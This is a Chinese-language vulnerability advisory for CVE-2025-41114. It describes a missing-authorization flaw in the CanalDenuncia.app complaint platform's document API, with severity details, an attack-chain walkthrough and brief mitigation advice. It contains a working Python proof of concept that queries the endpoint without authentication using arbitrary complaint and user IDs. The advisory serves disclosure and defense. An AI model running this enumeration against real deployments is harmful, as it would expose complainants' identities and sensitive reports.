CVE-2025-41114 CanalDenuncia.app 授权缺失导致用户信息泄露

漏洞信息

漏洞编号

CVE-2025-41114

漏洞类型

授权缺失/越权访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41114是CanalDenuncia.app平台中的一个严重授权缺失漏洞。该漏洞存在于后端API接口'/backend/api/buscarDocumentosByIdDenunciaUsuario.php'中，允许未授权攻击者通过构造恶意的POST请求，使用任意用户的'id_denuncia'和'id_user'参数值来访问其他用户的敏感文档信息。由于该API端点缺少适当的权限验证机制，任何未经身份认证的用户都可以通过遍历这些参数来获取系统中的用户投诉文档数据，包括可能包含的个人身份信息、投诉内容详情等敏感数据。此漏洞的CVSS评分达到7.5分，属于高危级别，对系统的机密性造成严重影响。

技术细节

该漏洞属于OWASP Top 10中的'Broken Access Control'（失效的访问控制）类别。具体来说，问题出在CanalDenuncia.app的后端API实现中，'/backend/api/buscarDocumentosByIdDenunciaUsuario.php'端点没有正确验证当前登录用户是否有权访问指定投诉ID（id_denuncia）和用户ID（id_user）关联的文档数据。攻击者只需要知道或猜测有效的id_denuncia和id_user值，即可构造如下POST请求获取目标用户的敏感文档信息：POST /backend/api/buscarDocumentosByIdDenunciaUsuario.php，参数包括id_denuncia和id_user。由于服务端未对这些参数进行所有权验证，攻击者可以实现横向越权访问，查看系统中任意用户的投诉文档内容。该漏洞无需任何特殊权限即可利用，且无需用户交互配合，属于典型的未授权访问漏洞。

攻击链分析

STEP 1

步骤1

攻击者发现CanalDenuncia.app存在未授权访问的API端点/backend/api/buscarDocumentosByIdDenunciaUsuario.php

STEP 2

步骤2

攻击者构造恶意POST请求，通过遍历id_denuncia和id_user参数值来探测有效的数据

STEP 3

步骤3

服务端未验证请求者身份和权限，直接返回目标用户关联的投诉文档信息

STEP 4

步骤4

攻击者获取包含敏感信息的用户文档数据，造成机密性泄露

STEP 5

步骤5

攻击者可能利用获取的信息进行进一步攻击，如身份冒充或数据贩卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-41114 PoC - CanalDenuncia.app Authorization Bypass
# Target: CanalDenuncia.app
# Vulnerability: Missing authorization in /backend/api/buscarDocumentosByIdDenunciaUsuario.php

target_url = "http://target.com/backend/api/buscarDocumentosByIdDenunciaUsuario.php"

# Enumerate user documents by manipulating id_denuncia and id_user parameters
payload = {
    "id_denuncia": "1",  # Target complaint ID
    "id_user": "1"       # Target user ID
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

try:
    # Send POST request without authentication
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print(f"[+] Request successful - Status: {response.status_code}")
        print(f"[+] Response content:")
        print(response.text)
        
        # Check if sensitive data is leaked
        if "documentos" in response.text.lower() or "denuncia" in response.text.lower():
            print("[!] Vulnerable - Unauthorized access to user documents confirmed")
    else:
        print(f"[-] Request failed - Status: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

CanalDenuncia.app 全部版本

防御指南

临时缓解措施

在修复前，建议通过Web应用防火墙（WAF）对该API端点实施临时访问限制，仅允许受信任IP地址访问。同时添加基于令牌的会话验证机制，确保每个请求都携带有效的用户认证信息。对于敏感操作实施多因素认证，并监控异常访问模式。